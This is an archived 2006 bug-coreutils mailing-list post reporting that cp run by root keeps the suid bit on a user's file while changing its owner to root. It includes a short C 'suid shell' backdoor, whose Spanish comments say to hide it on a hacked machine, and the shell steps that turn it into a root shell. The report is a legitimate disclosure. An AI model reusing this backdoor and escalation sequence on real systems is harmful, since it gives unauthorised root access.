bug-coreutils
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Permissions over suid files


From: Pedro Andujar
Subject: Permissions over suid files
Date: Mon, 2 Oct 2006 16:15:41 +0200

Hello,

When root is copying a non-privileged user file with the bit suid on,
the file gets "chowned" to root and bit suid is not removed.

That could mean a security compromise.

Example:

address@hidden ~]$ cat > c.c
/* Suid shell || uid=0(root) gid=0(root) || Lo compilas y ocultas
* en la maquina hackeada. Despues: "chmod 6755 suidshell", todo
* esto como root. Crg
*/

#include <stdio.h>
#define root 0

main()
{
   system("clear");
   printf("Now you are r00t!!\n\n");
   seteuid(root);
   setuid(root);
   setgid(root);
/* cambiar "/bin/bash" por "/bin/sh" en caso que el sistema no tuviera bash */
   system("/bin/bash");
}


address@hidden ~]$ make c
cc     c.c   -o c
address@hidden ~]$ chmod 6755 c


**now root**

address@hidden tmp]# cp /home/pandujar/c ./
address@hidden tmp]# ls -l c
-rwsr-sr-x  1 root root 5172 Oct  2 16:13 c


**user again**

address@hidden ~]$ /tmp/c


Now you are r00t!!

address@hidden ~]#


Other tools like "chown" have this kind of protection:

address@hidden tmp]# cd /home/pandujar/
address@hidden pandujar]# ls -l c
-rwsr-sr-x  1 pandujar tiger 5172 Oct  2 16:13 c
address@hidden pandujar]# chown root.root c
address@hidden pandujar]# ls -l c
-rwxr-xr-x  1 root root 5172 Oct  2 16:13 c




reply via email to

[Prev in Thread] Current Thread [Next in Thread]